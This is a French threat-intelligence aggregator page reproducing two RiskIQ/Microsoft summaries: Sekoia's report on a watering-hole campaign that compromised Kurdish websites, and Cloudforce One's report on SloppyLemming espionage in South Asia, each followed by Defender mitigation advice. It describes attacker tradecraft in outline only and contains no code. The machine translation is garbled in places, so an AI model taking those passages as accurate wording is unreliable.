One Article Review
| Source |  RiskIQ |
|---|---|
| Identifiant | 8585058 |
| Date de publication | 2024-09-25 19:49:34 (vue: 2024-09-25 20:18:29) |
| Titre | SilentSelfie: Uncovering a major watering hole campaign against Kurdish websites (Recyclage) |
| Texte | ## Instantané L'équipe de détection et de recherche sur les menaces de Sekoia (TDR) a publié un rapport détaillant une série de cyberattaques ciblant les sites Web kurdes. ## Description Ils ont découvert 25 sites Web kurdes compromis par quatre variantes différentes d'un script malveillant.Les sites compromis incluent ceux liés à la presse kurde et aux médias, à l'administration du Rojava et aux forces armées, ainsi que des partis politiques et des organisations révolutionnaires de la Turquie et des régions kurdes. Les scripts variaient en complexité, des versions de base qui ont collecté des emplacements actuels des utilisateurs à des emplacements plus avancés qui ont suivi des emplacements pendant 400 jours, accédé aux caméras selfie et poussé une application Android malveillante.Conçus pour recueillir des renseignements auprès des visiteurs, les scripts ont collecté des données comme l'emplacement, les images et les informations sur l'appareil, certains employés par l'obscurcissement pour échapper à la détection.Ces scripts ont été trouvés sur plusieurs sites, notamment des médias et des plateformes politiques liées à la communauté kurde.Les utilisateurs dirigés les plus sophistiqués pour installer un APK malveillant qui a récolté les contacts, l'emplacement et les détails du réseau. La campagne est remarquable pour sa durée et sa échelle, à partir de la fin de 2022..Bien que l'attribution reste incertaine, le TDR de Sekoia \\ évalue que les acteurs potentiels incluent les services de renseignement turcs, les services de renseignement syriens, le gouvernement régional kurde et l'Iran, chacun avec des motifs de plausibilité variable compte tenu des tensions géopolitiques impliquant des forces kurdes au Moyen-Orient. ## Recommandations Microsoft recommande les atténuations suivantes pour réduire l'impact de cette menace. - Allumez [Protection en livraison du cloud] (https://learn.microsoft.com/en-us/defender-endpoint/linux-preférences) dans Microsoft Defender Antivirus ou l'équivalent de votre produit antivirus pour couvrir rapidement les outils d'attaquant en évolution et et et les outils d'attaquant en évolution rapide ettechniques.Les protections d'apprentissage automatique basées sur le cloud bloquent la majorité des menaces nouvelles et inconnues. - Exécuter [EDR en mode bloc] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=Magicti_TA_LearnDoc)Le défenseur du point final peut bloquer les artefacts malveillants, même lorsque votre antivirus non microsoft ne détecte pas la menace ou lorsque Microsoft Defender Antivirus fonctionne en mode passif.EDR en mode bloc fonctionne dans les coulisses pour corriger les artefacts malveillants qui sont détectés post-abri. - Autoriser [Investigation and Remediation] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=Magicti_TA_LearnDoc) en mode automatisé complet pour permettre à Microsoft DefenderPour que le point final prenne des mesures immédiates sur les alertes pour résoudre les violations, réduisant considérablement le volume d'alerte. - [Activé] (https://learn.microsoft.com/en-us/defender-endpoint/enable-ctrelled-folders) Accès aux dossiers contrôlés. - Assurez-vous que [Protection de stimulation] (https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#how-do-i-configure-Or-Manage-Tamper-Protection) est activé dans Microsoft Defender pour Endpoint. - Activer [Protection réseau] (https://learn.microsoft.com/en-us/defender-endpoint/enable-network-protection) dans Microsoft Defender pour le point de terminaison. - Suivez les recommandations de durcissement des informations d'identification dans la [vue d'ensemble du vol d'identification sur prémisse] (https://security.microsoft.com/Thereatanalytics3/9382203E-5155-4B5E-AF74-21562B1004D5/analyStreport) |
| Notes | ★★ |
| Envoyé | Oui |
| Condensat | **© 2022 2024 2024** 21562b1004d5/analystreport 365/security/defender 400 4b5e 5155 access accessed action activity actor actors administration advanced af74 against age alert alerts all allow always android antivirus any apk app applications apps apps disabled are armed artifacts assesses as attack attacker attacks attribution authority automated based basic beginning behind being between block breach breaches cameras campaign can changes client cloud collected com/en com/microsoft com/threatanalytics3/9382203e common community complexity compromised configure connected consider contacts content controlled copyright cover credential criterion current customers cyber data days defend defender delivered description designed detailing details detect detected detection device different directed discovered distribution does duration each east edr email emergence employing enable enabled endpoint endpoint/attack endpoint/automated endpoint/edr endpoint/enable endpoint/linux endpoint/microsoft endpoint/prevent ensure equivalent evade even evolving executable far files folder folders follow following forces found four from full gather geopolitical given government groups hardening harvested has hole https://blog https://learn https://security identified images immediate impact include including information install installed intelligence investigation investigations involving io/silentselfie iran its keep install known kurdish late learndoc learning left like links list local location locations longer lsa lsass machine major majority malicious manage media meet microsoft middle mitigations mobile mode more most motives multiple network new news non not notable obfuscation ocid=magicti official ones only organizations outlets overview part parties passive permission platforms plausibility political post potential preferences premises press prevalence prevent previously product prohibited protection protection#how protections pushed ransomware rapidly receiving recommendations recommends reduce reducing reduction reference#block references region regional regions related released remains remediate remediation replacing report reproduction research reserved resolve revolutionary rights rojava rule rules run running scale scenes script scripts security sekoia selfie series services settings significantly silentselfie: site sites snapshot solutions some sophisticated sources stealing stores strongly subsystem such suggesting surface syrian tactics take tamper targeting tdr team techniques tensions theft thereof these those threat threats tools tracked trusted turkey turkish turn uncertain uncovering unknown unless updates us/defender use used users variant variants varied varying versions view=o365 visitors volume watering webmail websites websites/ when windows without works worldwide written xdr your |
| Tags | Ransomware Tool Threat Mobile |
| Stories | |
| Move | 
|
Les reprises de l'article (1):
| Source | RiskIQ |
|---|---|
| Identifiant | 8585015 |
| Date de publication | 2024-09-25 18:33:07 (vue: 2024-09-25 19:18:22) |
| Titre | Déstaurer les opérations de Salsemming \\ à travers l'Asie du Sud Unraveling SloppyLemming\\'s Operations Across South Asia |
| Texte | #### Targeted Geolocations - Pakistan - Sri Lanka - China - Bangladesh #### Targeted Industries - Government Agencies & Services - Law Enforcement - Defense - Information Technology - IT Products & Services - Energy - Transportation Systems - Education - Higher Education ## Snapshot Cloudforce One has released a report detailing the activities of SloppyLemming, an advanced threat actor that has been observed impacting organizations in South and East Asian countries as part of an extensive espionage campaign. ## Description SloppyLemming, also tracked as OUTRIDER TIGER by [CrowdStrike](https://www.crowdstrike.com/adversaries/outrider-tiger/), is known for leveraging cloud service providers for credential harvesting, malware delivery, and command-and-control (C2) activities. The group often employs open-source adversary emulation frameworks like [Cobalt Strike](https://security.microsoft.com/intel-profiles/fd8511c1d61e93d39411acf36a31130a6795efe186497098fe0c6f2ccfb920fc) and Havoc. Cloudforce One notes the group\'s operations display poor operational security, allowing Cloudforce One to gain insights into their tools and tactics. A key focus of their operations is credential harvesting, often achieved through phishing emails that lead victims to fake login pages hosted on malicious Cloudflare Workers. The group uses a tool called CloudPhish to scrape login HTML content and log stolen credentials via Discord. In addition to phishing, SloppyLemming has been observed collecting Google OAuth tokens and engaging in malware operations. For instance, they have used Dropbox to host malicious RAR files that exploit WinRAR vulnerabilities, specifically [CVE-2023-38831](https://security.microsoft.com/intel-explorer/cves/CVE-2023-38831/). These files contain executables that deploy Remote Access Tools (RATs), enabling the group to maintain long-term access to compromised systems. SloppyLemming\'s credential harvesting operations primarily target organizations in Pakistan, focusing on sectors such as government, transportation, education, technology, and energy. Notably, the group has shown a particular interest in targeting Pakistani law enforcement agencies and entities involved with the country\'s nuclear power facility. Beyond Pakistan, SloppyLemming\'s efforts have extended to government and military organizations in Sri Lanka and Bangladesh, as well as Chinese energy and academic sectors. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat. - Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats. - Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach. - Allow [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume. - [Enable](https://learn.microsoft.com/en-us/defender-endpoint/enable-controlled-folders) controlled folder access. - Ensure that [tamper protection](https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protect |
| Notes | ★★★ |
| Envoyé | Oui |
| Condensat | ### #### **© 2023 2024 2024** 21562b1004d5/analystreport 365/security/defender 38831 38831/ 4b5e 5155 academic access accessed achieved across action activities actor addition advanced adversary af74 against age agencies alert alerts all allow allowing also andhavoc antivirus any are artifacts asia asia/ asian attack attacker authority automated bangladesh based been behind beyond block breach breaches called campaign can changes china chinese client cloud cloudflare cloudforce cloudphish cobalt collecting com/adversaries/outrider com/en com/intel com/microsoft com/threatanalytics3/9382203e command common components compromised configure contain content control controlled copyright countries country cover credential credentials criterion crowdstrike customers cve defend defender defense delivered delivery deploy description detailing detect detected detects discord display distribution does dropbox east edr education efforts email emails employs emulation enable enabled enabling encyclopedia endpoint endpoint/attack endpoint/automated endpoint/edr endpoint/enable endpoint/linux endpoint/prevent energy enforcement engaging ensure entities equivalent espionage even evolving executable executables exploit explorer/cves/cve extended extensive facility fake files focus focusing folder folders follow following frameworks from full gain gb/threat geolocations google government group hardening harvesting has have higher host hosted html https://learn https://security https://www immediate impact impacting industries information insights instance intelligence/research/report/unraveling interest investigation investigations involved key known lanka law lead learndoc learning leveraging like list local log login long lsa lsass machine maintain majority malicious malware malware: manage meet microsoft military mitigations mode name=trojan:win32/bitrep network new non not notably notes nuclear oauth observed ocid=magicti often one open operational operations organizations outrider overview pages pakistan pakistani part particular passive permission phishing poor post power preferences premises prevalence prevent primarily product products profiles/fd8511c1d61e93d39411acf36a31130a6795efe186497098fe0c6f2ccfb920fc prohibited protection protection#how protections providers ransomware rapidly rar rats recommendations recommends reduce reducing reduction reference#block references released remediate remediation remote report reproduction reserved resolve rights rule rules run running scenes scrape sectors security service services settings shown significantly site sloppylemming sloppylemmings snapshot source south specifically sri stealing stolen strike subsystem such surface systems tactics take tamper target targeted targeting techniques technology term theft thereof these threat threats through tiger tiger/ tokens tool tools tracked transportation trojan:win32/bitrep trusted turn unknown unless unraveling us/defender us/wdsi/threats/malware used uses victims view=o365 volume vulnerabilities webmail well when windows winrar without workers works worldwide written xdr your |
| Tags | Ransomware Malware Tool Vulnerability Threat Legislation Cloud |
| Stories | |
| Move |
|
L'article ne semble pas avoir été repris sur un précédent.